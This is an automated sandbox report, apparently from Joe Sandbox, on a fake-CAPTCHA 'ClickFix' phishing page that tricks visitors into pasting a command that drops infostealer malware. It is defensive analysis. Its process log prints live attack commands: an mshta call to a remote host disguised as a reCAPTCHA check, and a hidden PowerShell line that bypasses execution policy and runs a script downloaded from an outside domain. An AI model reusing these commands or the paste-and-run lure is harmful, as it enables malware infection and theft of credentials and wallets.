Windows Analysis Report
https://escooterzone.com/play.html

Overview

General Information

Sample URL: https://escooterzone.com/play.html
Analysis ID: 1592165

Detection

CAPTCHA Scam ClickFix
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detect drive by download via clipboard copy & paste
Sigma detected: Powershell Download and Execute IEX
Yara detected CAPTCHA Scam ClickFix
AI detected suspicious Javascript
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Phishing site or detected (based on various text indicators)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

AV Detection

Source: https://escooterzone.com/play.html Avira URL Cloud: detection malicious, Label: malware

Phishing

Source: Yara match File source: 1.0.pages.csv, type: HTML
Source: Yara match File source: 1.1.pages.csv, type: HTML
Source: 0.0.id.script.csv Joe Sandbox AI: Detected suspicious JavaScript with source url: https://escooterzone.com/play.html... This script demonstrates high-risk behaviors, including dynamic code execution (using `mshta` to potentially run remote scripts) and data exfiltration (copying sensitive information to the clipboard). The script also creates a fake reCAPTCHA popup, which could be part of a phishing attempt. These behaviors indicate a high likelihood of malicious intent, warranting a high-risk score.
Source: Chrome DOM: 1.0 OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm not a robot
Source: Chrome DOM: 1.1 OCR Text: Verify You Are Human Please verify that you are a human to continue. I'm nat a robat Verification Steps 1. Press Windows Button 2. Press CTRL + V 3. Press Enter
Source: https://escooterzone.com/play.html HTTP Parser: No favicon
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.254:443 -> 192.168.2.17:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.151.250:443 -> 192.168.2.17:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.108.8.254:443 -> 192.168.2.17:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.194.161:443 -> 192.168.2.17:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.216.225:443 -> 192.168.2.17:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.150.240.254:443 -> 192.168.2.17:49753 version: TLS 1.2
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: escooterzone.com
Source: global traffic DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: agiledeals.shop
Source: global traffic DNS traffic detected: DNS query: e1.foiloverturnarrival.shop
Source: global traffic DNS traffic detected: DNS query: veilyspen.shop
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe Process created: Commandline size = 10314
Source: classification engine Classification label: mal100.phis.spyw.evad.win@26/11@12/207
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eieldnfk.kk3.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe System information queried: HandleInformation
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\svchost.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1936,i,3349664962166437789,8395394203860028808,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://escooterzone.com/play.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: unknown Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://agiledeals.shop/s6.pdf # ? ''I am not a robot - reCAPTCHA Verification ID: 2165
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc 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
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\mshta.exe Section loaded: schannel.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\mshta.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: imgutil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mlang.dll
Source: C:\Windows\System32\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll (2 identical entries)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
